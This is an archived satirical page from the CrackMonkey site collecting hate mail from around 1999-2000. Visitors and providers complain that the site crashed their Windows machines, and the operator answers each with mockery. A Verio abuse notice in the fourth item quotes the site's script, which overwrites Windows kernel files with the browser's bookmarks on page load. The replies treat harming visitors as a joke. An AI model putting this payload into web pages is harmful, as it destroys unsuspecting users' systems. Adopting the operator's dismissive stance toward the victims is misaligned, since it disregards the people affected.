Home | FAQ | Warez | Fans | Stories | News | Scientology | SCO | Unisys | GAR | You | Hubris  
     
 
 
[CrackMonkey]

It just, like, showed up in my mailbox, and it had CrackMonkey all over it.
And that stuff's tough to scrape off, let me tell you.
--Rick Moen

Crackmonkey logo Copyright © Rev. Patty Morin, CrankMonkey

  1. why you suck
  2. Watch those headers!
  3. Secondary Nameservice
  4. Verio Repossesses my Routing

1: why you suck

Date: Tue, 19 Oct 1999 21:48:42 -0700 (PDT)
From: patrick sullivan <paddie@rocketmail.com>
Subject: why you suck
To: monkeymaster@crackmonkey.org

Did that get your attention? good. i am disappointed. i am programmer, and i have two boxes at home. one is nt, and the other is linux. i have to use both for work. that is the way it is. i have to use both f**king browsers at work. that is the reality of the f+&king situation. my friend and i were talking and i told him how recently i had quit a job because they wanted me to do ASP COM/DCOM crap and i disagreed with that technology. so i quit. so i have some strong feelings with technology.

neverthef@#kingless i visited yr site because my friend said i would like it. that it was funny and interesting. while we were on the phone, i popped over to your site to take a look. moments before i was working and testing some stuff on the NT box using IE . . . and you fucking know what happens next. now if this were just my "game box" or whatever, I wouldn't care. Reinstall the OS, the drivers, the games, etc. But this is one of my boxes i use for work, like paying my bills. so now, 2 1/5 hours later and my box still isn't running correctly, i am going to charge you for my f%^king time. i get paid $90.00 / hour. The way i see, you are more narrow minded than any hack / drone at Micro$oft, you damage people's sh!t without any f[a-z]{2}king warning.

The tab comes to

$270.00 for 2.5 hours work at $90.00 an hour. you can write me back and we can talk about this further OR you can apologize. i mean, wtf? it seems to me you are just as big a problem as anything BillG has come up with.

What exactly do you think you are getting across to me? huh? wow, that some big company makes mistakes? geez, you are a real genuis. what else do you do, look for cracks in the hoover dam and blow it up?

ok, so my little rant and whining is over. i did like the site. you have some interesting and funny things up. but come on, gimme a break.

seuss

Mr. Sullivan, the crackmonkey.org site makes a simple and polite request for your browser to overwrite the contents of your OS kernel with the bookmarks (favorites) file. Some browsers politely turn down the request, and some happily oblige. I think that this mail (and others like it) shows poor sportsmanship on the part of the user. After all, the computer is your friend. Trust the computer.

--Monkeymaster

2: Watch those headers!

Date: Thu, 21 Oct 1999 23:41:15 -0700
From: "\"Rocco Mulder\" <rcmulder@efstitle.com>
Subject: Fw: Your site
Date: Fri, 22 Oct 1999 02:32:15 -0400 MIME-Version:1 0 Content-Type:multipart/alternative;boundary = "---- = _NextPart_000_001E_01BF1C35 A76DD260"X-Priority:3 X-MSMail-Priority:Normal X-Mailer:Microsoft Outlook Express 5 00 2615 200 X-MimeOLE:Produced By;, Content-Transfer-Encoding: quoted-printable ----- Original Message ----- = 20 From:Rocco Mulder = 20 To:dns@KENZIK COM = 20 Sent:Friday, October 22, 1999 2:31 AM Subject:Your site Dear Sir or Madam:As I was surfing the net today, I followed a link to your site, = http://crackmonkey com/ Now my computer does not work Every time I try = to boot, it fails I called Microsoft and they told me I have to = reinstall Windows I am now really angry, and I have had to use another = computer to draft this letter to you You hackers may think that it is funny to break into people's systems = and make them stop working, but it isn't You people cost business = millions of dollars every day, and you do not seem to care that real = people are hurt by your actions I fully intend to make an example of = you for your malicious interference with my computer I demand that you pay for the consultant that I must now hire to = reinstall my, you may = consider this service of a formal complaint, and my lawyer will be in = touch with you In this case, I will seek recovery of all legal costs in = this matter, and treble all damages I will also be alerting relevant = government officials, so that they may prosecute you to the fullest = extent of the law It is people like you who ruin the Internet for the rest of us You = should be ashamed Yours,
"Rocco C. Mulder


------=_NextPart_000_001E_01BF1C35.A76DD260
Content-Type": "text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<HTML><HEAD>"
<META.conte

Mr Mulder, there appear to be problems with your computing environment far in excess of your lack of a kernel. I had to convert all of the periods in your letter to spaces, and get rid of lots of control characters. It still seems to have managed to get tangled up irreparably with your headers.

Please let me be the first to assure you that no one has broken into your computer. On the contrary! The crackmonkey.org site (which you erroneously refer to as crackmonkey.com) made the request to overwrite your kernel through the normal channels. It does not contain any buffer overflows, executable stack exploits, or password discovery routines. It simply contains code that says "please overwrite your kernel with the contents of your bookmarks file". Is it my fault that your computer did so?

I have never met you, and hold no ill will against you. As a matter of fact, I'm sure we'd enjoy each other's company. Why, I might even invite you over sometime! We'd sit around the hearth, sharing stories about our computing careers and drinking heavily.

--Monkeymaster

3: Secondary Nameservice

From: Kevin White <kevin.white@watchguard.com>
To: monkeymaster@crackmonkey.org
Subject: DNS
Date: Fri, 28 Jan 2000 16:24:11 -0800
X-Mailer: Internet Mail Service (5.5.2448.0)

I received your request for assistance hosting your DNS. In fact, I discovered multiple emails and a voice mail when I returned to my desk at the end of the day. Bear with me while I recap my perspective on the situation. I know precious little about you, your sites and how we came to host DNS for them.

Many months ago, during routine maintenance we discovered a number of domains in our DNS that we had no explanation for. I asked one of my co-workers to investigate them to see if we had a legitimate business reason for providing the service. A simple check revealed your name associated with most of the domains in question.

One of my co-workers was tasked with looking for web sites associated with those domains that might explain a link between our organization and these sites. The first stop was www.crackmonkey.org. While accessing the site the machine used to access the site experienced major OS problems. A return visit to the site and a check of the source revealed code that exploited a known hole in the MS implementation of Java.

At that time we decided we could not afford to be associated with any of these sites and removed the DNS entries.

I am sure that you are anxious to re-establish communication for your domains. Based on personal experience your quickest solution to regaining control is to phone the Internic. They can have it resolved in a matter of a couple of days. Without a compelling argument to re-establish the secondary DNS service for these domains we can not grant your request.

Sincerely,

Kevin White
Director, Information Systems
WatchGuard Technologies

Mr. White, my request was put through in order that I might have nameservice long enough to remove WatchGuard Technologies from the crackmonkey.org InterNIC records. Your refusal to grant my request can only be interpreted as a sign that you wish me to keep the InterNIC records as they are, showing the support that Watchguard has given to this site in the past.

As for your description of the site, I must say that for an authorized secondary nameserver for crackmonkey.org, you have been far too easily misled. The crackmonkey.org site contains no Java. The HTML is generated using m4 macros of my own devising, and all pages are 100% Java-free. The machine hosting the crackmonkey site does not even have a Java compiler installed!

I can only offer my humblest apologies for the multiple e-mails you received. During a nameservice crisis, it is often difficult to discern which mail has been successfully received. Perhaps you could set the watchguard.com domain nameservice to be served by my machines. Then I could demonstrate what happens when one's nameservers stop providing service without even the courtesy of a notification e-mail.

--Monkeymaster

4: Verio Repossesses my Routing

Date: Sun, 27 Feb 2000 22:40:00 -0800 (PST)
From: Larry Sherman <larry@computerrific.net>
Subject: Re: 204.94.189.42
Message-ID: <Pine.BSF.4.21.0002272220080.8289-100000@home.computerrific.net>

Nick,

I received a notice from Verio Abuse regarding your 'www.crackmonkey.org' site. The complaint had to do with malicious code in your default page. Here are the lines involved:

<script>
window.external.ImportExportFavorites(0,"c:\\winnt\system32\\ntoskrnl.exe");
</script>
<script>
window.external.ImportExportFavorites(0,"c:\\winnt\system32\\krnl386.exe");
</script>

Although these system files are "protected" from overwrite, a system could be destroyed if the unsuspecting visitor had a dual boot setup. The non-booted system would end up with bookmarks instead of a krnl file.

I had no choice but to have your site taken off the Net. I expected the Verio Abused department to contact you. It appears they didn't.

I did hit your site many times, but I wasn't attacking it. I was testing the null routing of 204.94.189.42. Curiously, my browser kept accessing your site when it shouldn't have been able to.

You need to contact abuse@verio.net about the future of your routing.

Regards,

Larry

--
Larry Sherman
Director, Systems Operations
Verio Inc (Best Internet)

Mr Sherman, I would be interested in hearing exactly how this dual-boot technique works. Microsoft has listed this control as being "secure", and I am at a loss to understand exactly how it could cause any damage.

I find it difficult to believe that you had no choice but to take my entire machine off the Internet. For example, you could have blocked port 80, or you could have left my machine alone altogether and issued a public security bulletin.

You could also have notified me of the problem and explained your malicious intent to me. Instead, you inserted malignant code into the routers that crackmonkey.org depends on, commencing a Denial of Service (DoS) attack on my site. Fortunately, I was able to use a complicated system of local relays to continue my mailing list services, but my other services were down for nearly a week.

To date, the only people who have complained to me of this problem have either attempted to extort money from me or have used it as a cheap excuse after ceasing to provide some legitimately-acquired service to me. Your message falls in the latter category. Since I have no alternative network connection at present, I must remove the above text from the HTML of this site.

Further e-mails described the text in question as being "malicious code". While code may be malignant, I do not believe that it yet has the necessary sentience to be "malicious". Please adjust your internal documentation to reflect this.

--Monkeymaster

     
  Home | FAQ | Warez | Fans | Stories | News | Scientology | SCO | Unisys | GAR | You | Hubris